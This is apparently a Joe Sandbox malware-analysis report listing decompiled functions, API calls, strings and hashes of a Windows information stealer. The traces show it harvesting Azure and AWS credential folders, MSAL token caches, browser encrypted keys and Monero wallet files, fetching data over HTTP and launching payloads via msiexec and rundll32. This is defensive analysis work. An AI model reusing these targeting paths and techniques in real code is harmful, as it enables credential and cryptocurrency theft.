                            • StrStrA.SHLWAPI(?,0108DB20,00000000,?,003D145C,00000000,?,00000000,010891D8), ref: 003BCD5A
                            • StrStrA.SHLWAPI(00000000,010890A8), ref: 003BCD71
                              • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B46), ref: 003BC943
                              • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B47), ref: 003BC957
                              • Part of subcall function 003BC820: lstrcat.KERNEL32(?,003D0B4E), ref: 003BC978
                            • lstrlen.KERNEL32(00000000), ref: 003BCE44
                            • CloseHandle.KERNEL32(00000000), ref: 003BCE9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: 6fa107ca6deb1e427393ae39f7162072ae2f0a49e48b1554c8ba8b55a4845f6a
                            • Instruction ID: 3255a0c4179ca9e49b5d9022c4a5255771aa30676ee30b490ffe44e9c07d378b
                            • Opcode Fuzzy Hash: 6fa107ca6deb1e427393ae39f7162072ae2f0a49e48b1554c8ba8b55a4845f6a
                            • Instruction Fuzzy Hash: BDE110B191060CABDB16EBA0DC96FEEB778AF14304F40415DF106EA191DF346E4ACB66
                            Function 003C8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • RegOpenKeyExA.ADVAPI32(00000000,0108B288,00000000,00020019,00000000,003D05B6), ref: 003C83A4
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003C8426
                            • wsprintfA.USER32 ref: 003C8459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003C847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 003C8499
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                            • Instruction ID: 13028e42dfaad457788aa40996ee3d8b5e3610394db36a386b73d5a9f1e0bbff
                            • Opcode Fuzzy Hash: 54f5d49b7a89fdd67113fe3279df56bf77124b2de8183a8e3980207cbd16a707
                            • Instruction Fuzzy Hash: 66810BB191021CABDB25DB50CC95FEAB7B8FB18704F008299E109E6140DF756F89CF95
                            Function 003C4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4DB0
                            • lstrcat.KERNEL32(?,\.azure\), ref: 003C4DCD
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                              • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4E3C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 003C4E59
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                              • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                              • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                            • lstrcat.KERNEL32(?,00000000), ref: 003C4EC8
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003C4EE5
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49B0
                              • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D08D2), ref: 003C49C5
                              • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C49E2
                              • Part of subcall function 003C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003C4A1E
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,0108E7E8), ref: 003C4A4A
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FF8), ref: 003C4A5C
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A70
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,003D0FFC), ref: 003C4A82
                              • Part of subcall function 003C4910: lstrcat.KERNEL32(?,?), ref: 003C4A96
                              • Part of subcall function 003C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003C4AAC
                              • Part of subcall function 003C4910: DeleteFileA.KERNEL32(?), ref: 003C4B31
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: ae58852ece91987a7c1a1deb70f1d26e8cb318bae67c0f09aea69c7088aa803c
                            • Instruction ID: e307828eb1cf2611d46166c3de94dc39bf1c2c69f3af125f556df254657c2900
                            • Opcode Fuzzy Hash: ae58852ece91987a7c1a1deb70f1d26e8cb318bae67c0f09aea69c7088aa803c
                            • Instruction Fuzzy Hash: 0641A3BA94020867D711F770EC47FED7338AB24704F404859B249AA1C1EEB45BC98B93
                            Function 003C9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003C906C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateGlobalStream
                            • String ID: image/jpeg
                            • API String ID: 2244384528-3785015651
                            • Opcode ID: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                            • Instruction ID: f48e6ab5dd39bdca4e24dc9d973642f6760fd6ad842b3a1210d679fe63cbe52d
                            • Opcode Fuzzy Hash: dabf7dfc52e55501922344d19852cad9a1951aef1aaf576da7ce07310c594f8d
                            • Instruction Fuzzy Hash: 8A71EFB1910208ABDB14EFE4DC89FEDB7B8BB58700F108509F515EB294DB78A905DB62
                            Function 003C2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C31C5
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C335D
                            • ShellExecuteEx.SHELL32(0000003C), ref: 003C34EA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                            • Instruction ID: a7bdadb506d92cc980b89c9d6822fa0941d7b98f906d19175dd8642c7ef55efe
                            • Opcode Fuzzy Hash: bd01ec339d1fd26c7097ea46ca05a5d7fd9c39a6bdedda8df0d7a6b53010d2f0
                            • Instruction Fuzzy Hash: 5F12DC7181060C9BDB1AEBA0DC92FEEB778AF14304F50415DE506AA191EF742F4ACF66
                            Function 003C52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                              • Part of subcall function 003B6280: InternetOpenA.WININET(003D0DFE,00000001,00000000,00000000,00000000), ref: 003B62E1
                              • Part of subcall function 003B6280: StrCmpCA.SHLWAPI(?,0108E7B8), ref: 003B6303
                              • Part of subcall function 003B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003B6335
                              • Part of subcall function 003B6280: HttpOpenRequestA.WININET(00000000,GET,?,0108DFD8,00000000,00000000,00400100,00000000), ref: 003B6385
                              • Part of subcall function 003B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003B63BF
                              • Part of subcall function 003B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B63D1
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003C5318
                            • lstrlen.KERNEL32(00000000), ref: 003C532F
                              • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 003C5364
                            • lstrlen.KERNEL32(00000000), ref: 003C5383
                            • lstrlen.KERNEL32(00000000), ref: 003C53AE
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: 9ea668a929b175c27087ee2dcbc3135f09252d8a829958eb1c8c7322d47a5507
                            • Instruction ID: 44f60df51b44011b547b537569a545ee443893858cde7daee09953953b34adb2
                            • Opcode Fuzzy Hash: 9ea668a929b175c27087ee2dcbc3135f09252d8a829958eb1c8c7322d47a5507
                            • Instruction Fuzzy Hash: 9651F77091064CABCB1AFF60D996FEE7B79AF10308F50401CE50A9A592EF346F45DB62
                            Function 003C12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 68592796cbeae1470943ffb4bd781025a47a59c085915f9c3f88dd36091f9af1
                            • Instruction ID: 69fd9948188713a4bacbd3bc8f43750daec8b6cbf6490fd2995f81c330f80f5a
                            • Opcode Fuzzy Hash: 68592796cbeae1470943ffb4bd781025a47a59c085915f9c3f88dd36091f9af1
                            • Instruction Fuzzy Hash: EDC180B590020D9BCB15EF60DC89FEA7778BB64304F00459DF50AEB241EA74AE85DF92
                            Function 003C4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003C42EC
                            • lstrcat.KERNEL32(?,0108E470), ref: 003C430B
                            • lstrcat.KERNEL32(?,?), ref: 003C431F
                            • lstrcat.KERNEL32(?,0108D530), ref: 003C4333
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003C8D90: GetFileAttributesA.KERNEL32(00000000,?,003B1B54,?,?,003D564C,?,?,003D0E1F), ref: 003C8D9F
                              • Part of subcall function 003B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                              • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                              • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                              • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                              • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                              • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                              • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                              • Part of subcall function 003C93C0: GlobalAlloc.KERNEL32(00000000,003C43DD,003C43DD), ref: 003C93D3
                            • StrStrA.SHLWAPI(?,0108E5C0), ref: 003C43F3
                            • GlobalFree.KERNEL32(?), ref: 003C4512
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                              • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                              • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                              • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 003C44A3
                            • StrCmpCA.SHLWAPI(?,003D08D1), ref: 003C44C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003C44D2
                            • lstrcat.KERNEL32(00000000,?), ref: 003C44E5
                            • lstrcat.KERNEL32(00000000,003D0FB8), ref: 003C44F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 0829d83d5a35cb7c4fc62a856190e550a2ce7c251333182578155c1395c1f7db
                            • Instruction ID: be8b646f55fd2089d6853d0223bc831c18db3fec6c4059e029eaa1fb413d7dfb
                            • Opcode Fuzzy Hash: 0829d83d5a35cb7c4fc62a856190e550a2ce7c251333182578155c1395c1f7db
                            • Instruction Fuzzy Hash: 627177B6900208ABCB15EBA0DC95FEE7379AB48304F00459CF609E7181DA75DB49DF92
                            Function 003B1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B12B4
                              • Part of subcall function 003B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003B12BB
                              • Part of subcall function 003B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003B12D7
                              • Part of subcall function 003B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003B12F5
                              • Part of subcall function 003B12A0: RegCloseKey.ADVAPI32(?), ref: 003B12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 003B134F
                            • lstrlen.KERNEL32(?), ref: 003B135C
                            • lstrcat.KERNEL32(?,.keys), ref: 003B1377
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                              • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0108A270,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003B1465
                              • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
